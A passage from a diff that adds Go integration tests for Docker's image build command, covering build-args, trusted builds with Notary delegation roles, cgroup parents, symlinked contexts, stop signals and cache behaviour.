if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".") + if err != nil { + c.Fatalf("failed to build the image: %s, %v", out, err) + } + + if !strings.Contains(out, "Hello from Docker") { + c.Fatalf("bad output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) { + name := "testbuildemptystringvolume" + + _, err := buildImage(name, ` + FROM busybox + ENV foo="" + VOLUME $foo + `, false) + if err == nil { + c.Fatal("Should have failed to build") + } + +} + +func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + data, err := ioutil.ReadFile("/proc/self/cgroup") + if err != nil { + c.Fatalf("failed to read '/proc/self/cgroup - %v", err) + } + selfCgroupPaths := parseCgroupPaths(string(data)) + _, found := selfCgroupPaths["memory"] + if !found { + c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths) + } + cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-") + cmd.Stdin = strings.NewReader(` +FROM busybox +RUN cat /proc/self/cgroup +`) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out) + c.Assert(err, check.IsNil) + if !m { + c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out) + } +} + +func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) { + // Check to make sure our build output prints the Dockerfile cmd + // property - there was a bug that caused it to be duplicated on the + // Step X line + name := "testbuildnodupoutput" + + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN env`, false) + if err != nil { + c.Fatalf("Build should have worked: %q", err) + } + + exp := "\nStep 2/2 : RUN env\n" + if !strings.Contains(out, exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + } +} + +// GH15826 +func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) { + // Explicit check to ensure that build starts from step 1 rather than 0 + name := "testbuildstartsfromone" + + _, out, err := buildImageWithOut(name, ` + FROM busybox`, false) + if err != nil { + c.Fatalf("Build should have worked: %q", err) + } + + exp := "\nStep 1/1 : FROM busybox\n" + if !strings.Contains(out, exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + } +} + +func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) { + // Test to make sure the bad command is quoted with just "s and + // not as a Go []string + name := "testbuildbadrunerrmsg" + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN badEXE a1 \& a2 a3`, false) // tab between a2 and a3 + if err == nil { + c.Fatal("Should have failed to build") + } + shell := "/bin/sh -c" + exitCode := "127" + if daemonPlatform == "windows" { + shell = "cmd /S /C" + // architectural - Windows has to start the container to determine the exe is bad, Linux does not + exitCode = "1" + } + exp := `The command '` + shell + ` badEXE a1 \& a2 a3' returned a non-zero code: ` + exitCode + if !strings.Contains(out, exp) { + c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp) + } +} + +func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-build") + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, repoName) + + name := "testtrustedbuild" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err := runCommandWithOutput(buildCmd) + if err != nil { + c.Fatalf("Error running trusted build: %s\n%s", err, out) + } + + if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) { + c.Fatalf("Unexpected output on trusted build:\n%s", out) + } + + // We should also have a tag reference for the image. + if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 { + c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) + } + + // We should now be able to remove the tag reference. + if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 { + c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) + } +} + +func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL) + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, repoName) + + name := "testtrustedbuilduntrustedtag" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out) + } + + if !strings.Contains(out, "does not have trust data for") { + c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tempDir) + + // Make a real context directory in this temp directory with a simple + // Dockerfile. + realContextDirname := filepath.Join(tempDir, "context") + if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil { + c.Fatal(err) + } + + if err = ioutil.WriteFile( + filepath.Join(realContextDirname, "Dockerfile"), + []byte(` + FROM busybox + RUN echo hello world + `), + os.FileMode(0644), + ); err != nil { + c.Fatal(err) + } + + // Make a symlink to the real context directory. + contextSymlinkName := filepath.Join(tempDir, "context_link") + if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil { + c.Fatal(err) + } + + // Executing the build with the symlink as the specified context should + // *not* fail. + if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 { + c.Fatalf("build failed with exit status %d: %s", exitStatus, out) + } +} + +func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) { + testRequires(c, NotaryHosting) + + latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") + repoName := strings.TrimSuffix(latestTag, ":latest") + + // Now create the releases role + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // push a different tag to the releases role + otherTag := fmt.Sprintf("%s:other", repoName) + dockerCmd(c, "tag", "busybox", otherTag) + + pushCmd := exec.Command(dockerBinary, "push", otherTag) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) + s.assertTargetInRoles(c, repoName, "other", "targets/releases") + s.assertTargetNotInRoles(c, repoName, "other", "targets") + + out, status := dockerCmd(c, "rmi", otherTag) + c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) + + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, otherTag) + + name := "testtrustedbuildreleasesrole" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err = runCommandWithOutput(buildCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out)) + c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName)) +} + +func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) { + testRequires(c, NotaryHosting) + + latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") + repoName := strings.TrimSuffix(latestTag, ":latest") + + // Now create a non-releases delegation role + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // push a different tag to the other role + otherTag := fmt.Sprintf("%s:other", repoName) + dockerCmd(c, "tag", "busybox", otherTag) + + pushCmd := exec.Command(dockerBinary, "push", otherTag) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) + s.assertTargetInRoles(c, repoName, "other", "targets/other") + s.assertTargetNotInRoles(c, repoName, "other", "targets") + + out, status := dockerCmd(c, "rmi", otherTag) + c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) + + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, otherTag) + + name := "testtrustedbuildotherrole" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err = runCommandWithOutput(buildCmd) + c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out)) +} + +// Issue #15634: COPY fails when path starts with "null" +func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) { + name := "testbuildnullstringinaddcopyvolume" + + volName := "nullvolume" + + if daemonPlatform == "windows" { + volName = `C:\\nullvolume` + } + + ctx, err := fakeContext(` + FROM busybox + + ADD null / + COPY nullfile / + VOLUME `+volName+` + `, + map[string]string{ + "null": "test1", + "nullfile": "test2", + }, + ) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestBuildStopSignal(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet + imgName := "test_build_stop_signal" + _, err := buildImage(imgName, + `FROM busybox + STOPSIGNAL SIGKILL`, + true) + c.Assert(err, check.IsNil) + res := inspectFieldJSON(c, imgName, "Config.StopSignal") + if res != `"SIGKILL"` { + c.Fatalf("Signal %s, expected SIGKILL", res) + } + + containerName := "test-container-stop-signal" + dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top") + + res = inspectFieldJSON(c, containerName, "Config.StopSignal") + if res != `"SIGKILL"` { + c.Fatalf("Signal %s, expected SIGKILL", res) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)} + var dockerfile string + if daemonPlatform == "windows" { + // Bugs in Windows busybox port - use the default base image and native cmd stuff + dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+` + ARG %s + RUN echo %%%s%% + CMD setlocal enableextensions && if defined %s (echo %%%s%%)`, envKey, envKey, envKey, envKey) + } else { + dockerfile = fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s + CMD echo $%s`, envKey, envKey, envKey) + + } + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + } + + containerName := "bldargCont" + out, _ := dockerCmd(c, "run", "--name", containerName, imgName) + out = strings.Trim(out, " \r\n'") + if out != "" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envDef := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s=%s`, envKey, envDef) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + } + + out, _ := dockerCmd(c, "history", "--no-trunc", imgName) + outputTabs := strings.Split(out, "\n")[1] + if !strings.Contains(outputTabs, envDef) { + c.Fatalf("failed to find arg default in image history output: %q expected: %q", outputTabs, envDef) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachehit" + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build didn't use cache! expected image id: %q built image id: %q", origImgID, newImgID) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + extraEnvKey := "foo1" + extraEnvVal := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ARG %s + RUN echo $%s`, envKey, extraEnvKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachemiss" + args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal)) + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build used cache, expected a miss!") + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + newEnvVal := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachemiss" + args = []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal), + } + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build used cache, expected a miss!") + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ENV %s %s + RUN echo $%s + CMD echo $%s + `, envKey, envKey, envValOveride, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ENV %s %s + ARG %s + RUN echo $%s + CMD echo $%s + `, envKey, envValOveride, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldvarstest" + + wdVar := "WDIR" + wdVal := "/tmp/" + addVar := "AFILE" + addVal := "addFile" + copyVar := "CFILE" + copyVal := "copyFile" + envVar := "foo" + envVal := "bar" + exposeVar := "EPORT" + exposeVal := "9999" + userVar := "USER" + userVal := "testUser" + volVar := "VOL" + volVal := "/testVol/" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), + "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), + "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), + "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), + "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), + "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), + "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), + } + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + ARG %s + WORKDIR ${%s} + ARG %s + ADD ${%s} testDir/ + ARG %s + COPY $%s testDir/ + ARG %s + ENV %s=${%s} + ARG %s + EXPOSE $%s + ARG %s + USER $%s + ARG %s + VOLUME ${%s}`, + wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, + envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar), + map[string]string{ + addVal: "some stuff", + copyVal: "some stuff", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil { + c.Fatal(err) + } + + var resMap map[string]interface{} + var resArr []string + res := "" + res = inspectField(c, imgName, "Config.WorkingDir") + if res != filepath.ToSlash(filepath.Clean(wdVal)) { + c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res) + } + + inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr) + + found := false + for _, v := range resArr { + if fmt.Sprintf("%s=%s", envVar, envVal) == v { + found = true + break + } + } + if !found { + c.Fatalf("Config.Env value mismatch. Expected to exist: %s=%s, got: %v", + envVar, envVal, resArr) + } + + inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap) + if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok { + c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap) + } + + res = inspectField(c, imgName, "Config.User") + if res != userVal { + c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res) + } + + inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap) + if _, ok := resMap[volVal]; !ok { + c.Fatalf("Config.Volumes value mismatch. Expected volume: %s, got: %v", volVal, resMap) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldvarstest" + envKey := "foo" + envVal := "bar" + envKey1 := "foo1" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ENV %s %s + ENV %s ${%s} + RUN echo $%s + CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + ARG %s + CMD echo $%s`, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("able to access environment variable in output: %q expected to be missing", out) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support --build-arg + imgName := "bldargtest" + envKey := "HTTP_PROXY" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + CMD echo $%s`, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s=%s + ENV %s $%s + RUN echo $%s + CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + CMD echo $%s`, envKey, envKey) + + warnStr := "[Warning] One or more build-args" + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) { + c.Fatalf("build completed without warning: %q %q", out, err) + } else if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + +} + +func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + args := []string{ + "build", + "--build-arg", fmt.Sprintf("FOO1=fromcmd"), + "--build-arg", fmt.Sprintf("FOO2="), + "--build-arg", fmt.Sprintf("FOO3"), // set in env + "--build-arg", fmt.Sprintf("FOO4"), // not set in env + "--build-arg", fmt.Sprintf("FOO5=fromcmd"), + // FOO6 is not set at all + "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning + "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning + "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning + ".", + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG FOO1=fromfile + ARG FOO2=fromfile + ARG FOO3=fromfile + ARG FOO4=fromfile + ARG FOO5 + ARG FOO6 + RUN env + RUN [ "$FOO1" == "fromcmd" ] + RUN [ "$FOO2" == "" ] + RUN [ "$FOO3" == "fromenv" ] + RUN [ "$FOO4" == "fromfile" ] + RUN [ "$FOO5" == "fromcmd" ] + # The following should not exist at all in the env + RUN [ "$(env | grep FOO6)" == "" ] + RUN [ "$(env | grep FOO7)" == "" ] + RUN [ "$(env | grep FOO8)" == "" ] + RUN [ "$(env | grep FOO9)" == "" ] + `) + + ctx, err := fakeContext(dockerfile, nil) + c.Assert(err, check.IsNil) + defer ctx.Close() + + cmd := exec.Command(dockerBinary, args...) + cmd.Dir = ctx.Dir + cmd.Env = append(os.Environ(), + "FOO1=fromenv", + "FOO2=fromenv", + "FOO3=fromenv") + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + // Now check to make sure we got a warning msg about unused build-args + i := strings.Index(out, "[Warning]") + if i < 0 { + c.Fatalf("Missing the build-arg warning in %q", out) + } + + out = out[i:] // "out" should contain just the warning message now + + // These were specified on a --build-arg but no ARG was in the Dockerfile + c.Assert(out, checker.Contains, "FOO7") + c.Assert(out, checker.Contains, "FOO8") + c.Assert(out, checker.Contains, "FOO9") +} + +func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envKey1 := "foo1" + envKey2 := "foo2" + envKey3 := "foo3" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s="" + ARG %s='' + ARG %s="''" + ARG %s='""' + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ]`, envKey, envKey1, envKey2, envKey3, + envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3, + envKey2, envKey3) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envKey1 := "foo1" + envKey2 := "foo2" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s= + ARG %s="" + ARG %s='' + RUN [ "$%s" == "$%s" ] + RUN [ "$%s" == "$%s" ] + RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN env`, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out) + } +} + +func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { + volName := "testname:/foo" + + if daemonPlatform == "windows" { + volName = "testname:C:\\foo" + } + dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops") + + dockerFile := `FROM busybox + VOLUME ` + volName + ` + RUN ls /foo/oops + ` + _, err := buildImage("test", dockerFile, false) + c.Assert(err, check.NotNil, check.Commentf("image build should have failed")) +} + +func (s *DockerSuite) TestBuildTagEvent(c *check.C) { + since := daemonUnixTime(c) + + dockerFile := `FROM busybox + RUN echo events + ` + _, err := buildImage("test", dockerFile, false) + c.Assert(err, check.IsNil) + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image") + events := strings.Split(strings.TrimSpace(out), "\n") + actions := eventActionsByIDAndType(c, events, "test:latest", "image") + var foundTag bool + for _, a := range actions { + if a == "tag" { + foundTag = true + break + } + } + + c.Assert(foundTag, checker.True, check.Commentf("No tag event found:\n%s", out)) +} + +// #15780 +func (s *DockerSuite) TestBuildMultipleTags(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER test-15780 + ` + cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2", + "-t", "tag1:latest", "-t", "tag1", "--no-cache", "-") + cmd.Stdin = strings.NewReader(dockerfile) + _, err := runCommand(cmd) + c.Assert(err, check.IsNil) + + id1, err := getIDByName("tag1") + c.Assert(err, check.IsNil) + id2, err := getIDByName("tag2:v2") + c.Assert(err, check.IsNil) + c.Assert(id1, check.Equals, id2) +} + +// #17290 +func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY . ./`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + // warm up cache + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + // add new file to context, should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644) + c.Assert(err, checker.IsNil) + + _, out, err := buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Not(checker.Contains), "Using cache") + +} + +func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink target`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target") + c.Assert(out, checker.Matches, "bar") + + // change target file should 